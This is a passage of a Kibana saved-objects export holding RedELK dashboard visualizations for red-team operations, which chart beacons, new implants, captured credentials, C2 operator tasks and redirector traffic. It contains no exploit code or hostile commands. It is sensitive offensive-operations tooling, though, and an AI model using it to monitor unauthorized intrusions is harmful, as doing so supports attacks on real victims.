"{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Screenshots per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 145], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per user\"}"}, "coreMigrationVersion": "7.16.3", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 147], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Alarmed IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 149], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-4w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\",\"defaultYExtents\":false,\"setYExtents\":false},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Downloads\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Downloads\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - CS - Downloads over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 151], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top new implants by ext IP address and scenario", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of new implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.ip_ext\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Redirector IP\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"infra.attack_scenario\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Scenario\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":false,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top new implants by ext IP address and scenario\"}"}, "coreMigrationVersion": "7.16.3", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 154], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Cloud Tag", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IDs\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"threat.technique.id\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other TTPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"TTP\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - TTP Cloud Tag\"}"}, "coreMigrationVersion": "7.16.3", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 156], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: \\\"implant_newimplant\\\" AND (NOT tags: testsystems_V* )\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - Top users with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Top users with new implants\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":false,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}]}"}, "coreMigrationVersion": "7.16.3", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 158], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per host and user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other users\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other hosts\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Tasks per host and user\"}"}, "coreMigrationVersion": "7.16.3", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 160], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials captured\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Credentials captured\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Credentials captured\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Credentials over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 162], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":14,\"maxFontSize\":58,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Techniques tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 164], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per C2 operator", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Tasks launched\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Unknown user\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Tasks launched\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Tasks launched\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Tasks launched per operator\"}"}, "coreMigrationVersion": "7.16.3", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 166], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Hosts total unique count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"2\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"host.name\",\"customLabel\":\"Hosts\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Hosts total unique count\"}"}, "coreMigrationVersion": "7.16.3", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 168], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - CS - Downloads total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 170], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic over time\",\"type\":\"line\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_customer\\\"\",\"language\":\"kuery\"},\"label\":\"C2 traffic - Customer\"},{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Red team tests\"},{\"input\":{\"query\":\"redir.backend.name : c2* and not tags: \\\"iplist_customer\\\" and not tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Other\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"group\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"date_histogram\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}},\"schema\":\"segment\"}],\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"line\",\"mode\":\"normal\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"interpolate\":\"linear\",\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"}}"}, "coreMigrationVersion": "7.16.3", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 172], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic source table", "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic source table\",\"type\":\"table\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"Hits\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Source IP\"},\"schema\":\"bucket\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.as.organization.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"AS Organisation\"},\"schema\":\"bucket\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.geo.country_iso_code\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Country\"},\"schema\":\"bucket\"}],\"params\":{\"perPage\":10,\"showPartialRows\":true,\"showMetricsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":true,\"totalFunc\":\"sum\",\"percentageCol\":\"Hits\",\"showToolbar\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 174], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks execution timeframe", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"min\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"First task\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"max\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"Last task\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":24}}},\"title\":\"RedELK - Tasks execution timeframe\"}"}, "coreMigrationVersion": "7.16.3", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 176], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Target host and user selector", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1595867425052\",\"fieldName\":\"host.name\",\"parent\":\"\",\"label\":\"Target host(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1595867451919\",\"fieldName\":\"user.name\",\"parent\":\"\",\"label\":\"Target 